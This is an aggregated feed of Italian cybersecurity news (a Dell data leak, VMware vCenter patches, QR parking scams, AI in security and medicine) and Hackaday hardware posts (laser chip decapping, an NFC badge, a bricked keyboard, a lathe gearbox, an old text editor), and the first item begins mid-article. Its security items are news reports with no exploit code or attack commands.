Secondo quanto riportato, i dati trapelati includono dettagli sensibili dei dipendenti come ID, nomi completi, stato di occupazione e ID interni. Il post sul forum, accompagnato da un campione dei dati rubati, ha rivelato che la violazione è avvenuta all’inizio di settembre 2024.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

Post rinvenuto nel Dark Web

Nonostante la mancanza di password in chiaro o altre informazioni personali identificabili, la fuga di dati rappresenta comunque una minaccia significativa per Dell. Gli hacker potrebbero utilizzare queste informazioni per attacchi di phishing o truffe telefoniche, sfruttando la vulnerabilità dei dipendenti. Inoltre, questo incidente segue un altro data breach avvenuto a maggio 2024, in cui furono compromessi i dati di 49 milioni di clienti.

Conclusioni

Questo incidente non è il primo per Dell, che già in passato ha affrontato problemi del genere. Ancora una volta, questa violazione sottolinea l’importanza di implementare misure di sicurezza robuste e di effettuare audit regolari per proteggere i dati sensibili.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Nuovo Data Breach in Dell: rivelate informazioni riservate di oltre 10mila utenti proviene da il blog della sicurezza informatica.

Broadcom ha rilasciato aggiornamenti per risolvere una vulnerabilità critica in VMware vCenter Server che potrebbe portare all’esecuzione di codice in modalità remota. La vulnerabilità CVSS 9.8, denominata CVE-2024-38812, è una vulnerabilità di buffer overflow nel protocollo DCE/RPC.

Secondo le informazioni dello sviluppatore, gli aggressori con accesso alla rete possono utilizzare pacchetti di rete appositamente predisposti per attivare questa vulnerabilità, che consente l’esecuzione di codice remoto sul server vCenter.

Questo difetto è simile ad altre due vulnerabilità legate all’esecuzione di codice in modalità remota, CVE-2024-37079 e CVE-2024-37080, a cui è stata applicata una patch nel giugno 2024. Queste vulnerabilità hanno anche un punteggio CVSS di 9,8.

Inoltre, è stata corretta l’escalation della vulnerabilità dei privilegi CVE-2024-38813 con un punteggio di 7,5, consentendo agli aggressori con accesso alla rete di aumentare i privilegi al livello root. L’attacco è possibile anche inviando pacchetti di rete appositamente predisposti.

Entrambe le vulnerabilità sono state scoperte dai ricercatori di sicurezza del team TZL durante la competizione di sicurezza informatica Matrix Cup, che si è svolta in Cina nel giugno 2024.

Le correzioni sono disponibili per le seguenti versioni:

• vCenter Server 8.0 (risolto nella versione 8.0 U3b);
• vCenter Server 7.0 (risolto nella versione 7.0 U3s);
• VMware Cloud Foundation 5.x (correzione disponibile per la versione 8.0 U3b);
• VMware Cloud Foundation 4.x (risolto nella versione 7.0 U3s).

Broadcom ha sottolineato che attualmente non ci sono prove che gli aggressori sfruttino queste vulnerabilità, ma gli utenti sono fortemente incoraggiati ad aggiornare i propri sistemi per prevenire potenziali attacchi.

Le vulnerabilità sono legate ad errori di gestione della memoria, che aprono la possibilità di esecuzione di codice remoto quando si sfruttano i servizi VMware vCenter.

Questi eventi hanno coinciso con la pubblicazione di un avvertimento congiunto da parte della US Cybersecurity and Infrastructure Security Agency (CISA) e dell’FBI. Sottolinea la necessità di affrontare le vulnerabilità del cross-site scripting (XSS) che gli aggressori possono utilizzare per compromettere i sistemi.

L'articolo Dalla Cina con Etica! Una RCE da 9.8 su VMware vCenter Server. Aggiornate! proviene da il blog della sicurezza informatica.

Whether the goal is reverse engineering, black hat exploitation, or just simple curiosity, getting inside the packages that protect integrated circuits has long been the Holy Grail of hacking. It isn’t easy, though; those inscrutable black epoxy blobs don’t give up their secrets easily, with most decapping methods being some combination of toxic and dangerous. Isn’t there something better than acid baths and spinning bits of tungsten carbide?

[Janne] over at Fraktal thinks so, and the answer he came up with is laser decapping. Specifically, this is an extension of the laser fault injection setup we recently covered, which uses a galvanometer-scanned IR laser to induce glitches in decapped microcontrollers to get past whatever security may be baked into the silicon. The current article continues that work and begins with a long and thorough review of various IC packaging technologies, including the important anatomical differences. There’s also a great review of the pros and cons of many decapping methods, covering everything from the chemical decomposition of epoxy resins to thermal methods. That’s followed by specific instructions on using the LFI rig to gradually ablate the epoxy and expose the die, which is then ready to reveal its secrets.

The benefit of leveraging the LFI rig for decapping is obvious — it’s an all-in-one tool for gaining access and executing fault injection. The usual caveats apply, of course, especially concerning safety; you’ll obviously want to avoid breathing the vaporized epoxy and remember that lasers and retinas don’t mix. But with due diligence, having a single low-cost tool to explore the innards of chips seems like a big win to us.

hackaday.com/2024/09/20/laser-…

I gruppi criminali in Europa utilizzano attivamente la frode dei codici QR (quishing) per frodare i turisti. I ricercatori di Netcraft hanno riferito che due importanti bande criminali stanno utilizzando schemi di codici QR per pagare il parcheggio, diffondendoli in tutto il Regno Unito e in altri paesi.

I truffatori inseriscono codici QR falsi sui parchimetri, reindirizzando le persone a siti Web falsi che richiedono dati personali e della carta bancaria. Ciò non solo porta al furto di fondi, ma minaccia anche di multe per parcheggio non pagato.

Il primo segnale della nuova minaccia è arrivato ad agosto, quando la compagnia assicurativa britannica RAC ha avvertito gli automobilisti di fare attenzione e di pagare il parcheggio solo tramite app ufficiali o in contanti. La società stima che negli ultimi due mesi da quando è stato emesso l’allarme, più di 10.000 persone sono state colpite da questi programmi.

La diffusione di questo tipo di frode si sta gradualmente diffondendo oltre i confini europei. Pertanto, anche gli Stati Uniti e il Canada stanno iniziando ad affrontare questo problema. L’FBI ha già lanciato un avvertimento sulla minaccia rappresentata dai criminali informatici che utilizzano i codici QR per rubare fondi agli utenti.

Nel Regno Unito, i truffatori hanno iniziato con adesivi con codici QR nel centro di Londra prima che lo schema si diffondesse in città come Blackpool, Brighton, Portsmouth e Aberdeen. I truffatori attribuiscono particolare importanza ai turisti che non hanno familiarità con i sistemi di parcheggio locali.

Uno dei sindacati criminali si maschera da app PayByPhone. Gli utenti scansionano codici falsi, inseriscono i dati dell’auto e della carta bancaria e il sito conferma il pagamento avvenuto con successo. Tuttavia, in realtà, il denaro viene inviato ai truffatori.

Secondo i ricercatori, tutti i siti fraudolenti hanno caratteristiche simili: sono registrati tramite il registrar di nomi di dominio NameSilo e utilizzano i domini “.info”, “.click”, “.live” e altri. I siti falsi utilizzano anche la protezione Cloudflare per mascherare attività fraudolente.

Robert Duncan di Netcraft osserva che è difficile per le aziende proteggersi da tali attacchi perché i dispositivi mobili sono meno sicuri dei computer. Tuttavia, l’utilizzo di piattaforme specializzate per la protezione del marchio può aiutare a identificare le minacce in una fase iniziale.

L'articolo Quishing: Senza Soldi e con una Multa Salata! Il nuovo schema che dilaga in Europa proviene da il blog della sicurezza informatica.

A cura di Antonio Madoglio, SE Director Italy di Fortinet

Negli ultimi anni l’Intelligenza Artificiale è balzata agli onori della cronaca, suscitando la curiosità di utenti e aziende. Si tratta di un campo interdisciplinare dell’informatica che si occupa della creazione di sistemi capaci di eseguire compiti che, se svolti da esseri umani, richiederebbero intelligenza. L’obiettivo finale dell’IA è quello di sviluppare tecnologie che migliorino l’interazione uomo macchina, rendano più efficienti i processi decisionali e risolvano problemi che richiedono un alto livello di intelligenza.

L’Intelligenza Artificiale trova ampie applicazioni nella cybersecurity, può essere ad esempio utile per il rilevamento avanzato delle minacce, riducendo i falsi positivi, così come per prevedere gli attacchi informatici prima che avvengano. Ma non è tutto, l’IA può essere utilizzata per semplificare le SOC Operations.

L’Intelligenza Artificiale generativa (abbreviata in GenAI), di cui si sente tanto parlare ultimamente, è una tipologia di IA che ha la capacità di creare contenuti di vario genere, come ad esempio immagini oppure testi, che vengono generati, da qui il nome, in base a specifiche richieste da parte degli utenti, i cosiddetti prompt.
Antonio Madoglio, SE Director Italy di Fortinet
L’IA generativa sta ridefinendo le operazioni di rete e sicurezza, supportando i professionisti dei settori IT e cyber nell’obiettivo di completare più attività in minor tempo. Fortinet si impegna per essere all’avanguardia nell’innovazione di questo ambito e con questo obiettivo ha di recente presentato un nuovo assistente GenAI, FortiAI (ex Fortinet Advisor) integrandolo nelle sue soluzioni FortiAnalyzer, FortiSIEM e FortiSOAR. Questa novità sarà d’aiuto per tutti i team che si occupano delle security operations, supportandoli nel prendere decisioni più informate e nel rispondere più rapidamente alle minacce, semplificando anche le attività più complesse.

Le funzioni di IA generativa di FortiAI supportano OpenAI e Google Bard (solo per FortiSOAR) e possono essere collegate ad altri modelli linguistici di grandi dimensioni. FortiAI aumenta l’intelligence dei «public AI-engine» con la Fortinet intelligence, i prodotti e la conoscenza di use-case specifici di Fortinet, trasformando i prompt e le risposte di GenAI per fornire agli utenti un’esperienza in-product che sia semplice ma anche calata nel contesto e in grado di fornire risultati immediatamente utilizzabili. Gli specialisti di Fortinet che si occupano di IA aggiornano continuamente il database dell’intelligence di FortiAI e i meccanismi utilizzati, in modo tale da ottimizzare le interazioni degli utenti con l’Intelligenza Artificiale e i relativi risultati.

La condivisione dei dati nel cloud è limitata alle interazioni esplicite dei clienti e le informazioni sensibili possono essere mascherate prima della condivisione. FortiAI non condivide né fornisce accesso ai dati degli utenti, né consente al motore GenAI di utilizzare i loro dati per il training; non da ultimo l’accesso a FortiAI è soggetto ai controlli standard del prodotto.

Facciamo ora una carrellata dei vari prodotti e delle rispettive implementazioni, che ben rendono l’idea delle innovazioni apportate.

FortiAnalyzer offre una visibilità senza precedenti sulle infrastrutture IT e OT. Integrandosi perfettamente con i dispositivi e le applicazioni di tutto il Fortinet Security Fabric, esso è in grado di trasformare i dati grezzi in actionable intelligence, offrendo una visione consolidata che aiuta a eliminare i colli di bottiglia operativi, rafforza le difese con insight storici e in tempo reale e consente ai team che si occupano di security di essere sempre proattivi. La nuova release di FortiAI per FortiAnalyzer consente di semplificare e ottimizzare le operazioni di rete e di sicurezza, l’analisi delle minacce, le azioni di risposta e altro ancora. Le funzioni chiave di FortAI includono rilevamento, investigation, risposta e comandi ad hoc.

FortiSOAR centralizza, standardizza e automatizza la sicurezza IT/OT e le operazioni di rete. Grazie alle ampie integrazioni tra ambienti Fortinet e multivendor, alle ricche soluzioni use-case, alle centinaia di playbook precostituiti e alle funzionalità complete di gestione SecOps, FortiSOAR costituisce la base di automazione del Security Operations Center (SOC) per le principali organizzazioni aziendali e MSSP di tutto il mondo. Le funzioni di investigation, risposta e creazione di playbook di FortiAI per FortiSOAR sono state migliorate con nuove funzioni, tra cui approfondimenti sugli avvisi, promemoria GenAI, miglioramenti della privacy, logging forense.

FortiSIEM si occupa della raccolta centralizzata di eventi IT/OT, advanced detection analytics, incident management e altre funzioni SOC di cui i team che si occupano di sicurezza possono avere bisogno. Basata sull’user and entity behavior analytics (UEBA), su un configuration management database esclusivo (CMDB) e sull’assistenza GenAI, l’intuitiva analyst experience supporta tutti gli aspetti del monitoraggio delle minacce, della risposta agli incidenti e della convalida della conformità attraverso il Fortinet Security Fabric e le infrastrutture multivendor. Anche le funzioni di investigation, response e comando dei prodotti di FortiAI per FortiSIEM sono state migliorate. Le nuove funzioni includono threat hunting, profili di asset/utente e riassunti dei casi.

E per il futuro?

Fortinet si impegna a sviluppare ed espandere continuamente FortiAI e le altre soluzioni di Intelligenza Artificiale presenti nel portafoglio di prodotti. Questo include l’offerta di funzionalità GenAI simili per le infrastrutture WAN e LAN, con l’obiettivo di supportare i team che si occupano delle network operation, consentendo anche agli utenti meno esperti di raggiungere i risultati desiderati.

L'articolo L’IA generativa è il futuro, anche nella cybersecurity proviene da il blog della sicurezza informatica.

Mentre il mondo discute ancora dell’impatto dell’intelligenza artificiale (AI) sull’occupazione, i lavoratori dei call center nelle Filippine stanno già vivendo le conseguenze di questa trasformazione. Il Paese, noto come “capitale mondiale dei call center”, si trova ora a fronteggiare una nuova minaccia: la sostituzione dei lavoratori umani con robot e algoritmi avanzati.

Le grandi multinazionali, spinte dalla necessità di ridurre i costi e aumentare l’efficienza, stanno progressivamente implementando tecnologie AI nei loro servizi di outsourcing, mettendo a rischio fino a 300.000 posti di lavoro nel settore BPO (Business Process Outsourcing) filippino nei prossimi cinque anni. Tuttavia, questa rivoluzione tecnologica potrebbe anche creare nuove opportunità, con la previsione di 100.000 nuovi impieghi in aree come l’addestramento di algoritmi e la gestione dei dati.

Un esempio significativo di questa transizione è Christopher Bautista, un veterano del settore dei call center, che ha visto il suo lavoro essere gradualmente sostituito da soluzioni AI più economiche ed efficienti. Nonostante ciò, il numero complessivo di dipendenti nel settore continua a crescere, almeno per ora. La sfida, come sottolineato dagli esperti, è preparare adeguatamente i lavoratori per questa nuova era, garantendo che possano adattarsi e prosperare in un contesto lavorativo sempre più dominato dalla tecnologia.

L’intelligenza artificiale sta già dimostrando il suo potenziale nelle Filippine, con aziende come [24]7.ai che utilizzano chatbot avanzati per formare i nuovi dipendenti e ridurre i tempi di addestramento da tre mesi a poche settimane. Allo stesso tempo, multinazionali come Concentrix stanno sperimentando assistenti AI che monitorano e analizzano le conversazioni in tempo reale, evidenziando il crescente ruolo dell’automazione nei processi aziendali.

Il governo filippino ha risposto a queste sfide con iniziative volte a migliorare le competenze degli 1,7 milioni di lavoratori del settore, ma rimane ancora molta strada da fare. La necessità di aggiornare rapidamente le competenze è evidente, con figure di spicco come Arsenio Balisacan, capo dell’Autorità Nazionale per l’Economia e lo Sviluppo, che avvertono: “Se non aggiorni le tue competenze, l’AI ti sostituirà.”

Nonostante le preoccupazioni, il futuro non è del tutto oscuro. Le Filippine potrebbero diventare un esempio di come un Paese può adattarsi e prosperare durante una rivoluzione tecnologica, se saprà cogliere le opportunità offerte dall’intelligenza artificiale.

Conclusione

L’intelligenza artificiale sta rapidamente cambiando il volto del settore dei call center nelle Filippine, con implicazioni significative per il futuro dell’occupazione. Il Paese si trova a un bivio, dove rischi e opportunità coesistono. Prepararsi adeguatamente e adattarsi alla nuova realtà sarà essenziale per garantire che i lavoratori filippini possano continuare a prosperare in un mondo tecnologicamente sempre più avanzato.

L'articolo Il Futuro dei Call Center nelle Filippine: Cosa faranno gli impiegati una volta superati dai Chatbot? proviene da il blog della sicurezza informatica.

Like many of us, [Gabe] has things he just can’t stop buying. In his case, it is portable satellite dishes. You’ve seen these. They look like a dome or maybe a hard hat on some kind of motorized base. What’s in them? What can you do with them? Watch the video below and find out.

As [Gabe] points out, you can often find these on the surplus market for very little money. You can sometimes find them on the side of the road for free, too. Although we’ve never been that lucky.

The video shows three generations of Winegard antennas. It shows what’s inside and how to command them. Of course, the obvious use for these is as an antenna. But we also were thinking they’d make a fair motion base for something, too.

Some of the antennas lack any limit switches. On startup, the system spins until it grinds the plastic gears to find its travel limits. We expect that’s not good for the gears, but it does work. [Gabe] mentions it might be a bit of planned obsolescence, but we imagine it is more of a cost-saving measure.

Junkyards are a frequent source for satellite gear, apparently. Dishes have lots of other uses, too.

youtube.com/embed/6kQa6nfUkIs?…

hackaday.com/2024/09/19/inside…

I ricercatori dell’Università di Colonia hanno sviluppato un’innovativa piattaforma che utilizza l’intelligenza artificiale (AI) per analizzare il tessuto polmonare e diagnosticare il cancro. Il progetto è stato guidato dal dottor Yuri Tolkach e dal professor Reinhard Büttner della Facoltà di Medicina e dell’Ospedale Universitario di Colonia.

La piattaforma sviluppata utilizza algoritmi per analizzare automaticamente sezioni di tessuto di pazienti affetti da cancro ai polmoni. Il cancro al polmone è uno dei tipi di cancro più comuni e mortali. Il cancro polmonare non a piccole cellule (NSCLC) rappresenta oltre l’80% di tutti i tumori polmonari ed è considerato il secondo tipo più comune e mortale di cancro epiteliale.

Il successo del trattamento dipende in gran parte da un accurato esame patologico, in cui i patologi analizzano biopsie e campioni di resezione. L’introduzione dell’intelligenza artificiale può ottimizzare significativamente questo processo. Il dottor Tolkach osserva: “I nuovi strumenti non solo possono migliorare la qualità della diagnosi, ma anche fornire nuovi tipi di informazioni sulla malattia di un paziente, come la sua risposta al trattamento”.

Gli scienziati hanno addestrato l’intelligenza artificiale sul più grande set di dati di alta qualità disponibile, consentendo alla tecnologia di analizzare rapidamente campioni bioptici, segmentando accuratamente 11 tipi di tumore e tessuto benigno a livello di pixel.

Lo studio, pubblicato sulla rivista Cell Reports Medicine, dimostra due applicazioni chiave per lo strumento:

1. Creazione di un modello accurato per identificare i tipi di NSCLC, testato e convalidato con i dati dei pazienti provenienti da più ospedali.
2. Identificazione di quattro marcatori misurabili in campioni di tessuto che aiutano a prevedere la progressione del cancro e la sopravvivenza del paziente.

Inoltre, i ricercatori hanno pubblicato tre set di dati per supportare la ricerca globale sul cancro al polmone e lo sviluppo di algoritmi. Il team prevede di continuare gli studi di validazione in collaborazione con cinque istituti di patologia in Germania, Austria e Giappone.

L'articolo Pixel contro il Cancro! Come le AI migliorano la risposta al trattamento al cancro al polmone proviene da il blog della sicurezza informatica.

For this contest, we’re asking you to come up with the best SAO you can think of that does something cool. What could be cooler than sharing your contact information all over Supercon and beyond with a tap of a Jolly Wrencher? It’s way better than just some sticker, and with the extra solder pad on the back, you can turn it into a pin once the con is over. Contact data can be uploaded over I²C.
The KiCad-generated coil.
Here, [Phil Weasel] seeks to answer the question of whether one can make a working NFC tag with the M24LR04E IC, using a PCB trace as a coil. If there is an issue, it’s probably going to be that copper plane inside the antenna.

Designing the antenna itself proved fairly easy after checking the datasheet for the internal tuning capacitance (~27.5 pF), verifying the frequency of NFC (~13.56 MHz), and doing the math to find the inductance needed. After confirming everything in LTSpice, [Phil] used a PCB coil calculator and let the KiCad coil generator draw it out.

Did we mention the Jolly Wrencher is backlit by four side-mounted LEDs? Because what’s an SAO without a few blinkenlights?

hackaday.com/2024/09/19/2024-s…

I’m sure you all love to see some colorful blinkenlights every now and then, and we are of course no exception. While these might look like coasters at a distance, do not be deceived! They’re actually [bitluni]’s latest project!

[bitluni]’s high-fidelity LED matrix started life as some 8×8 LED matrices lying on the shelf for 10 years taunting him – admit it, we’re all guilty of this – before he finally decided to make something with them. That idea took the form of a tileable display with the help of some magnets and pogo pins, which is certainly a very satisfying way to connect these oddly futuristic blinky coasters together.

It all starts with some schematics and a PCB. Because the CH32V208 has an annoying package to solder, [bitluni] opted to have the PCB fab do placement for him. Unfortunately, though, and like any good prototype, it needed a bodge! [bitluni] had accidentally mirrored a chip in the schematic, meaning he had to solder one of the SMD chips on upside-down, “dead bug mode”. Fortunately, the rest was seemingly more successful, because with a little 3D-printed case and some fancy programming, the tiny tiles came to life in all of their rainbow-barfing glory. Sure, the pogo pins were less reliable than desired, but [bitluni] has some ideas for a future version we’re very much looking forward to.

Video after the break.

youtube.com/embed/8wMKw4m6-Rc?…

Has your hunger for blinkenlights not been satiated? More posts about [bitluni] perhaps? How about the time [bitluni] made a very blinkenlight-y “super”computer?

hackaday.com/2024/09/19/is-tha…

Should you be able to brick a keyboard just by writing a driver to flash the lights on it? We don’t think so either. [TheNotary] got quite the shock when embarking on a seemingly straightforward project to learn C++ on the x86-64 architecture with Windows and sent it straight to Silicon Heaven with only a few seemingly innocent USB packets.

The project was a custom driver for the XVX S-K80 mechanical keyboard, aiming to flash LED patterns across the key LEDs and perhaps send custom images to the integrated LCD. When doing this sort of work, the first thing you need is the documentation of the communications protocols. Obviously, this was not an option with a closed-source project, so the next best thing is to spy on the existing Windows drivers and see how they worked. Using Wireshark to monitor the USB traffic whilst twiddling with the colour settings, it was clear that communications were purely over HID messages, simplifying subsequent analysis. Next, they used x32dbg (now x64dbg, but whatever) to attach to the existing driver process and trap a few interesting Windows system calls. After reading around the Windows API, a few candidate functions were identified and trapped. This gave them enough information to begin writing code to reproduce this behaviour. Then things got a bit odd.

There apparently was a lot of extra protocol baggage when performing simple tasks such as lighting an LED. They shortened the sequence to reduce the overhead and noticed an additional byte that they theorized must encode the number of packets to expect in case only a subset of the LEDs were being programmed. Setting this to 0x01 and sending LED code for single keys appeared to work and was much faster but seemed unreliable. After a short experiment with this mystery value, [TheNotary] reverted the code to send all the packets for the full LED set as before, forgetting to correct this mystery value from the 0xFF it was programmed to during the experiment. They were surprised that all the LEDs and LCD were switched off. They were then horrified when the keyboard never powered up again. This value appeared to have triggered an obscure firmware bug and bricked it—a sad end to what would have been a fun little learning project.

Keyboard hacks are so plentiful it’s hard to decide where to start. How about upgrading the keyboard of your trusty ZX81? Here’s a lovely, minimal mechanical keyboard powered by a Pi Pico, and finally while we’re thinking about drivers bricking your stuff, who can forget FTDI gate? We may never forgive that one.

Header image: Martin Vorel, CC BY-SA 4.0.

hackaday.com/2024/09/19/revers…

Running a metal lathe is not for the faint of heart. Without proper knowledge and preparation, these machines can quickly cause injury or destroy expensive stock, tools, or parts. The other major problem even for those with knowledge and preparedness is that some of their more niche capabilities, like cutting threads with a lead screw, can be tedious and complicated thanks to the change gear system found on some lathes. While these are useful tools for getting things done, [Not An Engineer] decided that there was a better way and got to work building an electronic gearbox to automate the task of the traditional mechanical change gear setup in this video.

What makes change gears so tricky is that they usually come as a set of many gears of different ratios, forcing the lathe operator to figure out the exact combination of gears needed to couple the spindle of the lathe to the feed screw at the precise ratio needed for cutting a specific thread pattern. It is possible to do this task but can be quite a headache. [Not An Engineer] first turned to an Arduino Nano to receive input from a rotary encoder connected to the shaft of the lathe and then instruct a motor to turn the feed screw at a set ratio.

The first major problem was that the Arduino was not nearly fast enough to catch every signal from the encoder, leading to a considerable amount of drift in the output of the motor. That was solved by upgrading to a Teensy 4.1 with a 600 MHz clock speed. There was still one other major hurdle to cross; the problem of controlling the motor smoothly when an odd ratio is selected. [Not An Engineer] used this algorithm to inspire some code, and with that and some custom hardware to attach everything to the lathe he has a working set of electronic change gears that never need to be changed again. And, if you don’t have a lathe at all but are looking to get started with one, you can always build your own from easily-sourced parts.

youtube.com/watch?v=iSDNKmk5B2…

hackaday.com/2024/09/19/lathe-…

You often learn the golden rule or some variation of it as early as kindergarten. There are several ways to phrase it, but you most often hear: “Do unto others as you would have them do unto you.” While that’s catchy, it is really an aphorism that encourages us to consider the viewpoints of others. As people who design things, this can be tricky. Sometimes, what you want isn’t necessarily what most people want, and — conversely — you might not appreciate what most people want or need.

EDIT/1000

HP/1000 CC-BY-SA-3.0 by [Autopilot]I learned this lesson many years ago when I used to babysit a few HP/1000 minicomputers. Minicomputer sounds grand, but, honestly, a Raspberry Pi of any sort would put the old HP to shame. Like a lot of computers in those days, it had a text editor that was arcane even by the standards of vi or emacs. EDIT/1000 couldn’t be sure you weren’t using a printing terminal, and the commands reflect that.

For example, printing a few lines around the current line requires the command: “/-2,L,5” which isn’t that hard, I suppose. To delete all lines that contain a percent sign, “1$ D/%/A/” assuming you don’t want to be asked about each deletion.

Sure, sure. As a Hackaday reader, you don’t find this hard to puzzle out or remember. But back in the 1980s, a bunch of physicists and chemical engineers had little patience for stuff like that. However, the editor had a trick up its sleeve.

Old Terminal Basics

Old HP terminals didn’t work like you think of a terminal today. The computer would send a whole screen to the terminal along with some instructions. This was common on several brands of computers, even though it is rare today. For example, the computer might send a form with some data. The user can then use the terminal to modify the data or add new data. Then, with a single keystroke, the entire screen goes back to the computer for processing.

In the case of EDIT/1000, you could invoke screen mode, which would load a page of text into your terminal. Then you could use the arrow keys, insert, delete and the experience wasn’t too far from using a text editor today. Until you wanted to change pages, that is.

You’d use /S to start the screen mode from the current location in a file. But to move forward you needed to use Control+F. Well, that’s if you wanted to send your changes to the computer. You could also move forward and discard your changes by pressing Control+F twice. There were a handful of other commands you could use in screen mode. To do things like search and replace, you still needed the oddball commands along with the Control+X incantation to execute a command while in screen mode.

Complaint Department

We heard no end of complaints about EDIT/1000 and spent a lot of time helping people fix their mistakes made while editing. Training didn’t really seem to help. There didn’t seem to be any other reasonable options as far as buying a different editor.

The problem is, we were split into two camps. People who knew how to use EDIT/1000 well and people who needed to use it, but didn’t really know anything about it.

One More Puzzle Piece

HP terminals of the day all had an interesting feature. The keyboards had nine keys along the top row — what you’d think of as function keys today. The monitors always had eight little spots at the bottom that had labels for what the keys did. The ninth key let you page through a couple of sets of function keys. You can see that in the HP terminal teardown video below.

youtube.com/embed/Rhz4QqS4two?…

So F1 might have “Help” on the screen above it, unless you set the next page where it might say “Clear” or something. The effect was best on the terminals where the keyboard and screen were one piece so the labels lined up.

Then One Day…

I was thinking, probably uncharitably, about how stupid people were that couldn’t learn how to use the editor. I happened to be setting up custom function keys at the time. I wrote a quick program to put a few editor-specific keys on the terminal like “next page” and “previous page” and mapped them to the correct commands.

That worked fine, and then I wrote a short program to launch the editor on a file and put it into screen mode. I grabbed someone passing by and had them try it. By the end of the day, everyone was using “my” editor.

No Genius

I can’t overstate how simple this was. I later reduced it to just a batch file that copied a text file to the terminal to set the function keys, and then launched the editor. And everyone loved it. The people who knew how to use the editor didn’t need all this, of course. And they knew how easy it was. But they loved that it saved people asking dumb questions or messing up their files. The other users just loved it because it made the editor easy.

This predates easy access to the Internet, and a common thing in those days was to trade tapes with other sites. You’d get a magnetic tape in the mail, mount it, look at what was on it, copying anything you found interesting. Then you’d add anything you had to the end, and send it to the next place. In a year or so, the tape would make its way back around to you and the process would repeat. I put my editor on the outbound tape.

Within a year or so, people were literally finding me — hard to do in those days — and sending me real letters thanking me for my editor solution.

The Moral

The script to do this was extremely trivial. It probably took 10 minutes to write and once you knew how to do it, maybe less. But the point was, the people who knew how to write the script didn’t need it. The people who needed it were those who had no more idea how to program function keys than I know how to perform open heart surgery.

It doesn’t matter if it is hardware or software. Getting into the heads of users can really pay off.

hackaday.com/2024/09/19/design…